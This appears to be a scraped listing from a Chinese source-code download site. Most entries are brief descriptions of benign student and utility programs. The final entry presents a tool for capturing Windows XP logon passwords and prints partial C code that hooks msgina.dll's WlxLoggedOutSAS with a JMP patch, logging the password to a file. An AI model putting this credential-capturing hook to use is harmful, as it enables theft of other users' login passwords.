-
the bayer Raw to BMP
CMOS图像传感器的图像mt9p031拜耳原成BMP的源代码,人脸检测,大家可以参考。
- 2022-05-19 02:55:20下载
- 积分:1
-
activation and NumLock key CapsLoc
激活CapsLoc和NumLock键-activation and NumLock key CapsLoc
- 2023-05-17 08:15:04下载
- 积分:1
-
PC鼠标代码
如果大家想了解windows怎么实现对电脑鼠标的控制,都调用了那些函数可以看一下这个代码,有助于对该方面知识的学习。
- 2022-05-07 16:35:32下载
- 积分:1
-
This is the most short
这是一个求最短路和最小生成树的C++的原代码,经过调试可以在机子上使用.-This is the most short-circuit for a minimum spanning tree and the original C code, after testing the use of loom.
- 2022-02-15 01:09:35下载
- 积分:1
-
Determine palindrome
回文判断
输入一个字符串可以判断是不是回文。-Determine palindrome
- 2022-08-21 17:14:16下载
- 积分:1
-
哈工大 数据结构 课程设计 洗衣房管理系统 VB。Net实验
哈工大 数据结构 课程设计 洗衣房管理系统 VB。Net实验-Curriculum design data structure HIT Laundry Management System VB. Net Experiment
- 2022-02-15 21:37:46下载
- 积分:1
-
网址管理工具的源程序:是用vc开发的一个网址管理工具的程序....
网址管理工具的源程序:是用vc开发的一个网址管理工具的程序.-Web site management tools of the source : vc development is a Web site management tools procedures.
- 2023-08-01 17:50:03下载
- 积分:1
-
读一个只包含+,
读入一个只包含 +, -, *, / 的非负整数计算表达式,计算该表达式的值。
-Read one contains only+,-,*,/terms of non-negative integer expression, calculate the value of the expression.
- 2022-07-21 14:26:05下载
- 积分:1
-
文本解析器请认真阅读您的文件包和描述它在英语至少40字节…
text parser Please read your package and describe it at least 40 bytes in English.
System will automatically delete the directory of debug and release, so please do not put files on these two directory.
- 2022-07-17 18:36:08下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1